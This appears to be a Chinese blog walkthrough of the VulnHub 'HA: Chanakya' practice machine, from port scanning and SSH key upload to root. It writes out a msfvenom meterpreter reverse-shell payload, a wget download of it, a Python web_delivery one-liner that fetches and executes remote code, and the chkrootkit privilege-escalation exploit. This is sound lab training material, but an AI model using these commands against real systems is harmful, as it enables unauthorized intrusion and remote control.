chanakya

仅供个人娱乐

参考http://www.saulgoodman.cn/HA-Chanakya.html

靶机信息

https://www.vulnhub.com/entry/ha-chanakya,395/

一、主机探测

arp-scan -l

nmap -sV -p 1-65535 -A 192.168.236.136

dirb http://192.168.236.136

 

二、漏洞的查找和利用

百度   得到ROT13的加密方式

pcap流量包,直接下载即可

ashoka                             kautilya

首先进行21端口登录

22端口登陆失败

创建ssh-keygen

上传.ssh 使用kali免密登录

ssh-keygen

然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中

root@kali:~/桌面# cd ~/.ssh

root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

mkdir .ssh

cd.ssh

put authorized_keys

root@kali:~/.ssh# ssh ashoka@192.168.236.136

提权

先msf生成一个木马反弹一个meterpreter回话过来

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf

python -m SimpleHTTPServer

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.236.129

cd /tmp

wget http://192.168.236.129:8000/shell.elf

sysinfo

使用post模块来查看可以利用那些提权exploit:

run post/multi/recon/local_exploit_suggester

info exploit/linux/local/netfilter_priv_esc_ipv4

失败

使用命令注入来反弹一个shell:

use exploit/multi/script/web_delivery

set lhost 192.168.236.129

python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"

在目标机运行:

使用rootkit攻击模块:

这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。

set rhosts 192.168.236.136

set session 1

set lport 8888

exploit

python -c'import pty;pty.spawn("/bin/bash")'

 

参考文章http://www.saulgoodman.cn/HA-Chanakya.html

posted @ 2020-06-13 09:29  bingtanghulu  阅读(185)  评论(0编辑  收藏  举报